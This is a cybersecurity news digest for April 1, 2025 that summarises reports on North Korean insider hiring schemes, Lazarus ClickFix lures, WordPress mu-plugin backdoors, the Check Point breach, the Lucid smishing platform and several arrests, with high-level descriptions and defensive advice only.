Daily News Update: Monday, April 1, 2025 (Australia/Melbourne)

Audio Summary: Monday, April 1, 2025 (Australia/Melbourne)

0:00

/482.616

1×

North Korean Infiltration a Serious Threat to Global Businesses

North Korean nationals have infiltrated businesses globally, securing full-time employment as engineers and specialists with privileged access to enterprise systems.

DTEX reports active investigations within 7% of their Fortune Global 2000 customer base, estimating that thousands of critical infrastructure organisations have been infiltrated. These individuals often have "the keys to the kingdom," with the ability to manage access rights, install software, and write code.

Adam Meyers, head of CrowdStrike’s counter adversary operations, noted that nearly 40% of their incident response cases involving North Korea were insider-threat operations.

Once hired, these individuals move quickly to infiltrate the organisation further, often pivoting to third parties and supply chains. They also install remote access tools, blending in with typical onboarding activities.

DTEX's Rob Schuett noted that North Korean workers often exhibit anomalous behaviour, such as extremely long login times with no logout activity, sometimes running for four to five days continuously.

What we see with the DPRK worker is completely anomalous compared to everybody else, meaning you’ll see a login time that runs an extremely long amount of time and then there is no logout activity.

Organisations can identify potential insider threats during the hiring process by requiring remote job candidates to be on camera, paying attention to inconsistencies on resumes, and looking for a lack of communication in meetings.

_{CyberScoop | "The North Korea worker problem is bigger than you think"}

North Korean Hackers Adopt ClickFix Attacks

The Lazarus hacking group, linked to North Korea, has adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry. Sekoia have dubbed the activity 'ClickFake', as an evolution of their 'Contagious Interview' campaign.

ClickFix involves using fake errors on websites or documents, prompting users to run PowerShell commands that download and execute malware.

Sekoia reports that Lazarus impersonates major cryptocurrency companies like Coinbase, KuCoin, and Kraken in their lures. The attackers have shifted focus from developers to non-technical roles in Centralised Finance (CeFi) companies, such as business developers and marketing managers. Victims are invited to remote interviews and, when attempting to record a video introduction, are presented with a fake error and instructions to run a curl command that infects them with a Go-based backdoor named 'GolangGhost'.

Once deployed, GolangGhost connects to its command and control (C2) server and can perform file operations, execute shell commands, steal Chrome cookies, and harvest system metadata.

Sekoia has shared Yara rules to detect and block ClickFake activity.

_{Bleeping Computer | "North Korean hackers adopt ClickFix attacks to target crypto firms"}

_{Sekoia | "From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic"}

Hackers Abuse WordPress MU-Plugins

Hackers are exploiting WordPress mu-plugins ("Must-Use Plugins") to stealthily run malicious code on every page, evading detection.

Must-Use Plugins (mu-plugins) are a special type of WordPress plugin that automatically execute on every page load without needing to be activated in the admin dashboard.

Sucuri researchers have observed a rise in this technique, with attackers using the 'wp-content/mu-plugins/' directory to run three distinct types of malicious code:

• redirect.php: Redirects visitors to a malicious website displaying a fake browser update prompt.
• index.php: A webshell that acts as a backdoor, fetching and executing PHP code from a GitHub repository.
• custom-js-loader.php: Loads JavaScript that replaces images with explicit content and hijacks outbound links.

Sucuri recommends applying security updates, disabling unnecessary plugins and themes, and protecting privileged accounts with strong credentials and multi-factor authentication.

_{Bleeping Computer | "Hackers abuse WordPress MU-Plugins to hide malicious code"}

Check Point Confirms Breach

Check Point has confirmed a data breach, claiming it was an "old" event involving a few organisations and a portal that does not include customers' systems, production, or security architecture. A cybercrime forum user, CoreInjection, claimed to have stolen "highly sensitive" data, including internal network maps, user credentials, and proprietary source code.

Check Point stated that the breach affected only three organisations in December 2024 and was due to the abuse of compromised credentials for a portal account with limited access. Alon Gal, co-founder and CTO of Hudson Rock, initially raised concerns about the allegations but later noted that the scope of the breach is likely narrower than initially thought.

_{The Register | "Check Point confirms breach, but says it was 'old' data and crook made 'false' claims"}

Gamaredon Phish Delivers Remcos RAT

The Russian state-backed Gamaredon group is conducting an ongoing campaign to install the Remcos RAT on Ukrainian computers. The group uses phishing emails including malicious attachments or links to malicious ZIP files hosted on remote servers, with lures purporting to relate to troop movements in Ukraine.

The malicious files execute a PowerShell script that downloads a ZIP file containing the Remcos spying tool.

Cisco Talos attributes this campaign with medium confidence to Gamaredon, who have been operating since 2013. Ukraine detected 277 incidents they attribute to the group, which is linked to the Russian FSB.

_{The Record | "Latest gambit for Gamaredon: Fake Ukraine troop movement documents with malicious links"}

Moscow Subway System Disruption

The Moscow subway system's website and mobile application experienced disruptions, cited as "technical maintenance" by authorities, but is more plausibly due to a cyberattack.

During the outage, the website displayed a message purportedly from Ukraine's national railway operator, Ukrzaliznytsia, which was recently hit by a large-scale cyberattack disrupting their ticketing systems. Ukrainian hackers have frequently targeted Russian transport infrastructure, including previous incidents affecting Moscow's fare systems.

While authorities have not officially confirmed a cyberattack, the incident highlights the ongoing cyber conflict between Ukraine and Russia, with transport infrastructure being a frequent target.

_{The Record | "Moscow subway app and website disrupted in possible retaliation for Ukraine railway hack"}

Sign up for Opalsec

Actionable insights for Cyber Security Professionals

Subscribe

Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Lucid Phishing Platform

A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). Operated by Chinese cybercriminals known as the 'XinXin group' since mid-2023, Lucid is sold via a subscription-based model, providing access to over 1,000 phishing domains, tailored phishing sites, and spamming tools.

The threat group claims to send 100,000 smishing messages daily via Rich Communication Services (RCS) or Apple iMessage, which are end-to-end encrypted, allowing them to evade spam filters.

The platform employs an automated attack delivery mechanism, deploying customizable phishing websites distributed primarily through SMS-based lures. Lucid operators use large-scale iOS and Android device farms to send text messages, impersonating shipping, tax alerts, or missed toll payments.

Victims are redirected to fake landing pages impersonating state government toll and parking agencies or private entities, designed to steal personal and financial information. The platform's built-in credit card validator then checks the validity of the stolen cards, which are then either sold to other cybercriminals or used directly for fraud.

_{Bleeping Computer | "Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks"}

Microsoft Uses AI to Find Bootloader Flaws

Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. These flaws impact devices relying on UEFI Secure Boot, and if the right conditions are met, attackers can bypass security protections to execute arbitrary code on the device and deploy persistent malware.

Microsoft discovered eleven vulnerabilities in GRUB2, including integer and buffer overflows in filesystem parsers, command flaws, and a side-channel in cryptographic comparison. 9 additional vulnerabilities - mainly buffer overflows requiring physical access to perform - were discovered in the U-Boot and Barebox bootloaders.

GRUB2, U-boot, and Barebox released security updates for the vulnerabilities in February 2025.

_{Bleeping Computer | "Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders"}

British Intel Intern Pleads Guilty to Smuggling Data

Hassan Arshad, a former intern at GCHQ, has pleaded guilty to risking national security by smuggling top secret information out of a protected computer in late 2022.

Arshad transferred sensitive material onto a smartphone and then uploaded the data to a hard drive connected to his personal computer. The information related to a "tool" used by GCHQ and included the names of agency employees.

_{The Record | "British intel intern pleads guilty to smuggling top secret data out of protected facility"}

Canadian Arrested over 2021 Texas GOP Hack

Aubrey Cottle, a Canadian man using the handle "Kirtaner", has been arrested for allegedly hacking into systems used by the Texas Republican Party in 2021 and stealing sensitive information. Cottle is charged with identity theft and faces a maximum sentence of five years in prison.

Cottle is accused of breaching Epik, a third-party hosting company, to deface and download a backup of the Texas Republican Party’s web server, which contained personal identifying information. Cottle then allegedly shared the stolen data online and publicly took credit for the attack on social media.

A search warrant issued for Cottle’s home resulted in the seizure of 20 terabytes of data, including emails claiming to have root access to Epik’s network.

_{The Record | "Canadian hacker arrested for allegedly stealing data from Texas Republican Party"}

_{CyberScoop | "DOJ charges hacker for 2021 Texas GOP website defacement"}